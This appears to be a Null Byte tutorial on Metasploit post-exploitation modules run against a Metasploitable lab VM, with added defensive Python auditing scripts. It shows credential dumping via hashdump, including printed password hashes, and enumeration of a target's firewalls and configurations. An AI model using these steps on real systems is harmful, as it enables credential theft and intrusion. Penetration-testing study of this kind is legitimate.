How to Collect Target Information Quickly with Metasploit Post Modules « Null Byte :: WonderHowTo



Gathering information after exploitation can be a long and tedious process, but it is an essential step when trying to pivot or to establish advanced persistence. Every hacker needs to know how to enumerate a target manually, but sometimes it is worthwhile to automate the process. Metasploit contains post modules that can quickly gather valuable information about a target, saving both time and effort.

In the previous tutorial we used Metasploit's local exploit suggester to get root on the target. To use post modules, a Meterpreter session must be active. These modules can run, to some extent, as any user, but root-level access is ideal because it gives us unrestricted access to the system.

What information is most valuable to an attacker?

It has been said time and time again that reconnaissance is one of the most critical phases of an attack. That applies not only to the initial preparation for an attack, but also to the post-exploitation phase. Successfully gathering information after a target has been compromised can lead to longer persistence and to the exploitation of additional machines.

Some of the most valuable information for an attacker includes things like password hashes, credentials, and other sensitive data that can be misused. Other interesting items are network configurations, system configurations, and standard software configuration files that are likely to be found on the system. Checking which defenses are present, such as antivirus or firewall rules, is also a smart move.

Module 1: Hashdump

To begin, use the sessions command from the main Metasploit prompt to display the sessions currently running in the background:

  msf5 > sessions

Active sessions
===============

  Id  Name  Type                   Information                                                Connection
  --  ----  ----                   -----------                                                ----------
  1         shell cmd/unix                                                                    10.10.0.1:4444 -> 10.10.0.50:58006 (10.10.0.50)
  2         meterpreter x86/linux  uid=1, gid=1, euid=1, egid=1 @ metasploitable.localdomain  10.10.0.1:4433 -> 10.10.0.50:32979 (10.10.0.50)
  3         meterpreter x86/linux  uid=0, gid=0, euid=0, egid=0 @ metasploitable.localdomain  10.10.0.1:4321 -> 10.10.0.50:56950 (10.10.0.50)

Session 3 is ideal here since it runs as root; this is the Meterpreter session we obtained in the previous tutorial, but any root session will do.

To view the available post modules, we can start typing the path and press Tab twice to see the auto-completion options:

  msf5 > use post/linux/gather/

use post/linux/gather/checkcontainer       use post/linux/gather/enum_network        use post/linux/gather/enum_xchat             use post/linux/gather/openvpn_credentials
use post/linux/gather/checkvm              use post/linux/gather/enum_protections    use post/linux/gather/gnome_commander_creds  use post/linux/gather/phpmyadmin_credsteal
use post/linux/gather/ecryptfs_creds       use post/linux/gather/enum_psk            use post/linux/gather/gnome_keyring_dump     use post/linux/gather/pptpd_chap_secrets
use post/linux/gather/enum_commands        use post/linux/gather/enum_system         use post/linux/gather/hashdump               use post/linux/gather/tor_hiddenservices
use post/linux/gather/enum_configs         use post/linux/gather/enum_users_history  use post/linux/gather/mount_cifs_creds

The first one we will try is the hashdump module; it dumps the password hashes for all users on the system, which we can then attempt to crack. Although we already have root on this machine, other credentials can often be reused to move around the network.

Load the module with the use command:

  msf5 > use post/linux/gather/hashdump

We can then look at the options for this post module:

  msf5 post(linux/gather/hashdump) > options

Module options (post/linux/gather/hashdump):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

The only option we need to set is the session to run it on. Use the set command with the correct session number:

  msf5 post(linux/gather/hashdump) > set session 3

session => 3

Then type run to start it:

  msf5 post(linux/gather/hashdump) > run

[+] root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:0:0:root:/root:/bin/bash
[+] sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:3:3:sys:/dev:/bin/sh
[+] klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:103:104::/home/klog:/bin/false
[+] msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
[+] postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
[+] user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:1001:1001:just a user,111,,:/home/user:/bin/bash
[+] service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:1002:1002:,,,:/home/service:/bin/bash
[+] Unshadowed password file: /root/.msf4/loot/20190619120310_default_10.10.0.50_linux.hashes_719586.txt
[*] Post module execution completed

We can now see the hashes for all users on the system and it even writes this information to a file for us.
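Hashdump writes its loot in the unshadowed passwd format shown above (user:hash:uid:gid:gecos:home:shell). The following Python script is an added example, not part of the original article or of Metasploit, that parses that format and audits it the way a defender reviewing the same file would: it identifies the crypt(3) scheme behind each hash, flags the weak md5crypt ($1$) and descrypt schemes every account on this target uses, and catches empty passwords on interactive accounts and extra uid 0 accounts. The sample lines are constructed with placeholder hash bodies; the shell list and scheme table are assumptions you can extend.

```python
import re

# crypt(3) scheme identifiers, matched against the start of the hash field.
HASH_SCHEMES = {
    "$1$": "md5crypt",
    "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
    "$5$": "sha256crypt",
    "$6$": "sha512crypt",
    "$7$": "scrypt",
    "$y$": "yescrypt",
}
WEAK_SCHEMES = {"descrypt", "md5crypt"}
# Shells that do not grant an interactive login (assumed list; extend per distro).
NOLOGIN_SHELLS = {"/bin/false", "/usr/sbin/nologin", "/sbin/nologin", "/bin/sync"}

# Constructed sample in hashdump's unshadowed format. Hash bodies are placeholders.
SAMPLE_UNSHADOWED = """\
root:$1$saltsalt$AAAAAAAAAAAAAAAAAAAAA.:0:0:root:/root:/bin/bash
sys:$1$saltsalt$BBBBBBBBBBBBBBBBBBBBB/:3:3:sys:/dev:/bin/sh
klog:$1$saltsalt$CCCCCCCCCCCCCCCCCCCCC0:103:104::/home/klog:/bin/false
admin:$6$saltsalt$DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD:1000:1000:admin,,,:/home/admin:/bin/bash
backupadm:$6$saltsalt$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE:0:0:backup admin,,,:/home/backupadm:/bin/bash
svc:!:1002:1002:,,,:/home/svc:/bin/bash
guest::1003:1003:guest,,,:/home/guest:/bin/bash
"""


def parse_unshadowed(text):
    """Parse unshadowed passwd lines; a leading '[+] ' from pasted console output is tolerated."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[+]"):
            line = line[3:].strip()
        # Real entries have exactly six colons; status lines like
        # "Unshadowed password file: ..." have fewer and are skipped.
        if line.count(":") < 6:
            continue
        user, pw, uid, gid, gecos, home, shell = line.split(":", 6)
        entries.append({"user": user, "hash": pw, "uid": int(uid), "gid": int(gid),
                        "gecos": gecos, "home": home, "shell": shell})
    return entries


def classify_hash(h):
    """Name the hashing scheme, or 'empty' / 'locked' / 'unknown'."""
    if h == "":
        return "empty"
    if h[0] in "!*":
        return "locked"
    for prefix, name in HASH_SCHEMES.items():
        if h.startswith(prefix):
            return name
    if len(h) == 13 and "$" not in h:   # traditional DES crypt: 2-char salt + 11 chars
        return "descrypt"
    return "unknown"


def audit_accounts(entries):
    """Return {user: [findings]} for the accounts a defender should act on."""
    findings = {}
    for e in entries:
        notes = []
        scheme = classify_hash(e["hash"])
        interactive = e["shell"] not in NOLOGIN_SHELLS
        if scheme == "empty" and interactive:
            notes.append("empty password on interactive account")
        if scheme in WEAK_SCHEMES:
            # Weak even on non-interactive accounts: the cracked password may be reused elsewhere.
            notes.append(f"weak hash scheme {scheme}")
        if e["uid"] == 0 and e["user"] != "root":
            notes.append("non-root account with uid 0")
        if notes:
            findings[e["user"]] = notes
    return findings


if __name__ == "__main__":
    for user, notes in audit_accounts(parse_unshadowed(SAMPLE_UNSHADOWED)).items():
        print(f"{user}: {'; '.join(notes)}")
```

Point the parser at the loot file hashdump names at the end of its run and the output becomes a remediation list: migrate md5crypt accounts to sha512crypt or yescrypt, lock or password the empty accounts, and investigate any second uid 0 account.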

Module 2: Checkvm

The next module we will try is the checkvm module; it attempts to determine whether the target is a virtual machine, which can be useful information for certain exploits or attack vectors.

Load the module:

  msf5 post(linux/gather/hashdump) > use post/linux/gather/checkvm

And view the options:

  msf5 post(linux/gather/checkvm) > options

Module options (post/linux/gather/checkvm):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Again, we just need to set a session number for this module to work. Since our session number will not change, we can use the setg command to globally set the option. That way we don't have to keep typing the same thing.

  msf5 post(linux/gather/checkvm) > setg session 3

session => 3

Type run to kick it off:

  msf5 post(linux/gather/checkvm) > run

[*] Gathering System info ....
[+] This appears to be a 'VirtualBox' virtual machine
[*] Post module execution completed

We can see that it determines that the target appears to be a VirtualBox virtual machine.

Module 3: enum_protections

The next one we will try is the enum_protections module; it attempts to find programs on the target that could be used to detect an attack, such as antivirus software, firewalls, IDS/IPS, network sniffers and others.

Load the module:

  msf5 post(linux/gather/checkvm) > use post/linux/gather/enum_protections

Because we set the session option globally earlier, it is already populated when we look at the options:

  msf5 post(linux/gather/enum_protections) > options

Module options (post/linux/gather/enum_protections):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  3                yes       The session to run this module on.

All we have to do now is execute the module:

  msf5 post(linux/gather/enum_protections) > run

[*] Running module against 10.10.0.50 [metasploitable]
[*]   Info:
[*]   (Metasploitable ASCII-art banner)
[*]   Warning: Never expose this VM to an untrusted network!
[*]   Contact: msfdev[at]metasploit.com
[*]   Login with msfadmin/msfadmin to get started
[*] Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
[*] Searching for security systems...
[+] ASLR is enabled
[*] Finding installed applications...
[+] ufw found: /usr/sbin/ufw
[+] iptables found: /sbin/iptables
[+] logrotate found: /usr/sbin/logrotate
[+] tcpdump found: /usr/sbin/tcpdump
[+] aa-status found: /usr/sbin/aa-status
[*] Post module execution completed

We can see that this time it prints the system's login banner, although it is a bit garbled, along with information about which security software is present. It found firewall software (ufw and iptables), AppArmor's aa-status and tcpdump, and ASLR is enabled; this type of information can be very valuable when planning an attack.
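The same output is just as useful read from the other side. The Python script below is an added example (not from the original article or from Metasploit) that parses enum_protections output lines of the form "[+] tool found: path" plus the ASLR line, then compares what was found against a baseline of controls a defender expects on the host and separately lists dual-use tools such as tcpdump that an intruder can turn against the network. The sample output, the EXPECTED_CONTROLS baseline and the DUAL_USE_TOOLS set are constructed assumptions; tune the two sets to your own environment.

```python
import re

# Output line shapes taken from the module run shown above.
FOUND_LINE = re.compile(r"^\[\+\]\s+(?P<tool>\S+)\s+found:\s+(?P<path>\S+)")
ASLR_LINE = re.compile(r"ASLR is (?P<state>\w+)")

# Constructed baseline, keyed by the binary name enum_protections reports.
EXPECTED_CONTROLS = {"iptables", "ufw", "auditd", "aide", "rkhunter", "fail2ban", "aa-status"}
# Tools the module also reports that help an intruder as much as an admin (constructed list).
DUAL_USE_TOOLS = {"tcpdump", "tshark", "wireshark", "nmap", "ngrep"}

# Constructed console excerpt in the format of the enum_protections run above.
SAMPLE_OUTPUT = """\
[*] Running module against 10.10.0.50 [metasploitable]
[*] Searching for security systems...
[+] ASLR is enabled
[*] Finding installed applications...
[+] ufw found: /usr/sbin/ufw
[+] iptables found: /sbin/iptables
[+] logrotate found: /usr/sbin/logrotate
[+] tcpdump found: /usr/sbin/tcpdump
[+] aa-status found: /usr/sbin/aa-status
[*] Post module execution completed
"""


def parse_protections(output):
    """Return {'tools': {name: path}, 'aslr': 'enabled'|'disabled'|None} from module output."""
    tools, aslr = {}, None
    for line in output.splitlines():
        m = FOUND_LINE.match(line.strip())
        if m:
            tools[m["tool"].lower()] = m["path"]
            continue
        m = ASLR_LINE.search(line)
        if m:
            aslr = m["state"].lower()
    return {"tools": tools, "aslr": aslr}


def assess(report, expected=EXPECTED_CONTROLS, dual_use=DUAL_USE_TOOLS):
    """Gap analysis: which expected controls are present or missing, and which dual-use tools exist."""
    found = set(report["tools"])
    return {
        "present": sorted(found & expected),
        "missing": sorted(expected - found),
        "dual_use_present": sorted(found & dual_use),
        "aslr": report["aslr"],
    }


if __name__ == "__main__":
    result = assess(parse_protections(SAMPLE_OUTPUT))
    for key, value in result.items():
        print(f"{key}: {value}")
```

Run against the sample, the report shows ufw, iptables and aa-status present, auditd, aide, rkhunter and fail2ban missing, and tcpdump flagged as dual-use, which is the same picture the attacker drew, expressed as a to-do list for the host's owner.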

Module 4: enum_configs

The next module we will try is the enum_configs module; it attempts to find configuration files for commonly used software. Although this information could be found manually, the module makes it easy to collect everything in one go.

Load the module:

  msf5 post(linux/gather/enum_protections) > use post/linux/gather/enum_configs

And run it:

  msf5 post(linux/gather/enum_configs) > run

[*] Running module against 10.10.0.50 [metasploitable]
[*]   Info:
[*]   (Metasploitable ASCII-art banner)
[*]   Warning: Never expose this VM to an untrusted network!
[*]   Contact: msfdev[at]metasploit.com
[*]   Login with msfadmin/msfadmin to get started
[*] Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
[+] apache2.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_509051.txt
[+] ports.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_670485.txt
[-] Cannot open file: /etc/nginx/nginx.conf: core_channel_open: operation failed: 1
[-] Cannot open file: /etc/snort/snort.conf: core_channel_open: operation failed: 1
[+] my.cnf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_055449.txt
[+] ufw.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_162601.txt
[+] sysctl.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_122073.txt
[-] Could not open file: /etc/security.access.conf: core_channel_open: operation failed: 1
[+] shells stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_678197.txt
[-] Cannot open file: /etc/security/sepermit.conf: core_channel_open: operation failed: 1
[-] Cannot open file: /etc/ca-certificates.conf: core_channel_open: operation failed: 1
[+] access.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_706115.txt
[-] Cannot open file: /etc/gated.conf: core_channel_open: operation failed: 1
[+] rpc saved in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_755377.txt
[-] Cannot open file: /etc/psad/psad.conf: core_channel_open: operation failed: 1
[+] debian.cnf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_345601.txt
[-] Cannot open file: /etc/chkrootkit.conf: core_channel_open: operation failed: 1
[+] logrotate.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_800174.txt
[-] Cannot open file: /etc/rkhunter.conf: core_channel_open: operation failed: 1
[+] smb.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_570254.txt
[+] ldap.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_677851.txt
[-] Cannot open file: /etc/openldap/openldap.conf: core_channel_open: operation failed: 1
[-] Cannot open file: /etc/cups/cups.conf: core_channel_open: operation failed: 1
[-] Cannot open file: /etc/opt/lampp/etc/httpd.conf: core_channel_open: operation failed: 1
[+] sysctl.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_441838.txt
[-] Cannot open file: /etc/proxychains.conf: core_channel_open: operation failed: 1
[-] Cannot open file: /etc/cups/snmp.conf: core_channel_open: operation failed: 1
[-] Cannot open file: /etc/mail/sendmail.conf: core_channel_open: operation failed: 1
[-] Cannot open file: /etc/snmp/snmp.conf: core_channel_open: operation failed: 1
[*] Post module execution completed

We can see it found all kinds of things, such as the Apache, sysctl and Samba configurations. It also stores each of these files in the loot directory for later use. For example, we can view the Apache configuration by catting the full path of the file:

  msf5 post(linux/gather/enum_configs) > cat /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_509051.txt

[*] exec: cat /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_509051.txt

#
# Based upon the NCSA server configuration files originally by Rob McCool.
#
# This is the main Apache server configuration file.  It contains the
# configuration directives that give the server its instructions.
# See http://httpd.apache.org/docs/2.2/ for detailed information about
# the directives.
#
# Do NOT simply read the instructions in here without understanding
# what they do.  They're here only as hints or reminders.  If you are unsure
# consult the online docs. You have been warned.
#
# The configuration directives are grouped into three basic sections:
#  1. Directives that control the operation of the Apache server process as a
#     whole (the 'global environment').
#  2. Directives that define the parameters of the 'main' or 'default' server,
#     which responds to requests that aren't handled by a virtual host.
#     These directives also provide default values for the settings
#     of all virtual hosts.
#  3. Settings for virtual hosts, which allow Web requests to be sent to
#     different IP addresses or hostnames and have them handled by the
#     same Apache server process.
#
# Configuration and logfile names: If the filenames you specify for many
# of the server's control files begin with "/" (or "drive:/" for Win32), the
# server will use that explicit path.  If the filenames do *not* begin
# with "/", the value of ServerRoot is prepended -- so "/var/log/apache2/foo.log"
# with ServerRoot set to "" will be interpreted by the
# server as "//var/log/apache2/foo.log".
#

...
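After a handful of module runs the loot directory holds dozens of files named only by timestamp, workspace, host, loot type and a random suffix, exactly as in the paths printed above. The Python script below is an added example (not from the original article or from Metasploit) that pulls every loot path out of saved console output, splits the filename into its fields and builds an index by host and loot type, newest file first, so that the enum_configs, enum_network and hashdump results for one host can be found without reading the console log again. The console excerpt is constructed from the format shown on this page; the script assumes the workspace name and host contain no underscores.

```python
import re
from collections import defaultdict
from datetime import datetime

# Loot filename convention visible in the module output above:
#   <YYYYmmddHHMMSS>_<workspace>_<host>_<ltype>_<random>.<ext>
# Assumption: workspace and host contain no underscores.
LOOT_NAME = re.compile(
    r"^(?P<ts>\d{14})_(?P<workspace>[^_]+)_(?P<host>[^_]+)_"
    r"(?P<ltype>.+)_(?P<rand>\d+)\.(?P<ext>\w+)$"
)
LOOT_PATH = re.compile(r"/\S+/loot/\S+")

# Constructed console excerpt in the format of the enum_configs/enum_network runs.
SAMPLE_CONSOLE = """\
[+] apache2.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_509051.txt
[-] Failed to open file: /etc/nginx/nginx.conf
[+] sysctl.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_122073.txt
[+] Network config stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_661472.txt
[+] Unshadowed password file: /root/.msf4/loot/20190619120310_default_10.10.0.50_linux.hashes_719586.txt
[+] Network config stored in /root/.msf4/loot/20190620090000_default_10.10.0.51_linux.enum.netwo_111111.txt
"""


def parse_loot_path(path):
    """Split one loot path into its fields, or return None if it does not follow the convention."""
    m = LOOT_NAME.match(path.rsplit("/", 1)[-1])
    if not m:
        return None
    rec = m.groupdict()
    rec["timestamp"] = datetime.strptime(rec.pop("ts"), "%Y%m%d%H%M%S")
    rec["path"] = path
    return rec


def extract_loot_paths(console_output):
    """Return every /.../loot/... path mentioned in saved console output."""
    return LOOT_PATH.findall(console_output)


def index_loot(paths):
    """Group parsed loot records as index[host][ltype] -> [records], newest first."""
    index = defaultdict(lambda: defaultdict(list))
    for p in paths:
        rec = parse_loot_path(p)
        if rec is not None:
            index[rec["host"]][rec["ltype"]].append(rec)
    for by_type in index.values():
        for recs in by_type.values():
            recs.sort(key=lambda r: r["timestamp"], reverse=True)
    return index


def summarize(index):
    """Flatten the index into (host, ltype, file count, newest timestamp) rows."""
    rows = []
    for host in sorted(index):
        for ltype in sorted(index[host]):
            recs = index[host][ltype]
            rows.append((host, ltype, len(recs), recs[0]["timestamp"].isoformat()))
    return rows


if __name__ == "__main__":
    for row in summarize(index_loot(extract_loot_paths(SAMPLE_CONSOLE))):
        print("%-12s %-18s %2d file(s)  newest %s" % row)
```

Feeding it the full console log of an engagement gives one table per host, which is also the inventory you need when deleting loot at the end of an authorized test.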

Module 5: enum_network

The next module we will run is the enum_network module; it collects all network-related information about the target, such as IP addresses, routes, open ports, SSH configs and DNS information.

Load the module:

  msf5 post(linux/gather/enum_configs) > use post/linux/gather/enum_network

And run it:

  msf5 post(linux/gather/enum_network) > run

[*] Running module against metasploitable.localdomain
[*] Module running as root
[+] Info:
[+]   (Metasploitable ASCII-art banner)
[+]   Warning: Never expose this VM to an untrusted network!
[+]   Contact: msfdev[at]metasploit.com
[+]   Login with msfadmin/msfadmin to get started
[+] Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
[*] Collecting data ...
[+] Network configuration stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_661472.txt
[+] Route table stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_402588.txt
[+] Firewall configuration stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_273816.txt
[+] DNS configuration stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_884409.txt
[+] SSHD config saved in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_100280.txt
[+] Host file stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_071264.txt
[+] SSH keys stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_372706.txt
[+] Active connections stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_029831.txt
[+] Wireless information stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_821137.txt
[+] Listening ports stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_676900.txt
[+] If-Up / If-Down stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_258463.txt
[*] Post module execution completed 

We can see that it has collected an abundance of network information, all of which may be useful to an attacker. For example, we can view the network configuration file:

  msf5 post(linux/gather/enum_network) > cat /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_661472.txt

[*] exec: cat /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_661472.txt

eth0      Link encap:Ethernet  HWaddr 08:00:27:77:62:6c
          inet addr:10.10.0.50  Bcast:10.10.0.255  Mask:255.255.255.0
          inet6 addr: fe80::a00:27ff:fe77:626c/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:2643 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2139 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:2268520 (2.1 MB)  TX bytes:361635 (353.1 KB)
          Base address:0xd010 Memory:f0000000-f0020000

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:325 errors:0 dropped:0 overruns:0 frame:0
          TX packets:325 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:125465 (122.5 KB)  TX bytes:125465 (122.5 KB)

Module 6: enum_system

The last module we will cover today is the enum_system module; it collects system information about the target, including the Linux version, installed packages, running services, cron jobs and user accounts. Again, these are all things that can be found manually, but sometimes it makes more sense to have it all done for you.

Load the module:

  msf5 post(linux/gather/enum_network) > use post/linux/gather/enum_system

And run it:

  msf5 post(linux/gather/enum_system) > run

[+] Info:
[+]   (Metasploitable ASCII-art banner)
[+]   Warning: Never expose this VM to an untrusted network!
[+]   Contact: msfdev[at]metasploit.com
[+]   Login with msfadmin/msfadmin to get started
[+] Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
[+] Module running as "root" user
[*] Linux version stored in /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_406677.txt
[*] User accounts stored in /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_739938.txt
[*] Installed packages stored in /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_051826.txt
[*] Ongoing services stored in /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_438719.txt
[*] Cron tasks stored in /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_890911.txt
[*] Disk information stored in /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_036761.txt
[*] Log files saved in /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_749148.txt
[*] Setuid / setgid files stored in /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_378666.txt
[*] Post module execution completed

We can see that it has discovered valuable system information. For example, we can view all user accounts on the system:

  msf5 post(linux/gather/enum_system) > cat /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_739938.txt

[*] exec: cat /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_739938.txt

root
daemon
bin
sys
sync
games
man
lp
mail
news
uucp
proxy
www-data
backup
list
irc
gnats
nobody
libuuid
dhcp
syslog
klog
sshd
msfadmin
bind
postfix
ftp
postgres
mysql
tomcat55
distccd
user
service
telnetd
proftpd
statd

Wrapping Up

Today we explored some of Metasploit's post modules for gathering valuable information about a target. We covered modules that check which protections are present and whether the system is a VM, modules that discover network and general software configuration information, and even a module that dumps password hashes. Although all of this information can be gathered manually, Metasploit makes the job quick and painless.

Cover image by Soumil Kumar/Pexels; screenshots by drd_/Null Byte